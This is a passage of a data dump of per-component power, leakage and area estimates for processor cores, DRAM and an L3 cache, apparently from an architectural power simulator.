'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.322615,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0915637,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.147689,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0745484,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.313801,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0552605,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.51601,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0609489,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00384059,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0533436,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0284035,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.114293,
'Execution Unit/Register Files/Runtime Dynamic': 0.0322441,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.128668,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.249849,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.25512,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000111944,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000111944,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000100747,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 4.07752e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000408019,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000732654,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.000957397,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.027305,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.73684,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0556564,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0927402,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.03964,
'Instruction Fetch Unit/Runtime Dynamic': 0.177392,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0299556,
'L2/Runtime Dynamic': 0.0113703,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 1.99413,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.381695,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0244909,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.024491,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.10978,
'Load Store Unit/Runtime Dynamic': 0.526967,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0603905,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.120781,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0214328,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0218813,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.10799,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.00912832,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.300917,
'Memory Management Unit/Runtime Dynamic': 0.0310096,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 14.5858,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.160329,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00608227,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0432225,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.209634,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.21149,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0693072,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.257126,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.342461,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0961706,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.15512,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0782991,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.329589,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0574878,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.55687,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0646982,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00403382,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.056411,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0298326,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.121109,
'Execution Unit/Register Files/Runtime Dynamic': 0.0338664,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.136173,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.263012,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.28897,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000109436,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000109436,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 9.88976e-05,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 4.02425e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000428548,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000746316,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.000921373,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0286788,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.82422,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0595382,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0974063,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.13127,
'Instruction Fetch Unit/Runtime Dynamic': 0.187291,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.027411,
'L2/Runtime Dynamic': 0.00854577,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.01309,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.386277,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0251045,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0251044,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.13164,
'Load Store Unit/Runtime Dynamic': 0.535188,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0619034,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.123807,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0219697,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0223797,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.113423,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.00976526,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.307272,
'Memory Management Unit/Runtime Dynamic': 0.032145,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 14.7439,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.170192,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00641015,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0453527,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.221954,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.27409,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 7.213421027751713,
'Runtime Dynamic': 7.213421027751713,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.290465,
'Runtime Dynamic': 0.103356,
'Subthreshold Leakage': 6.80085,
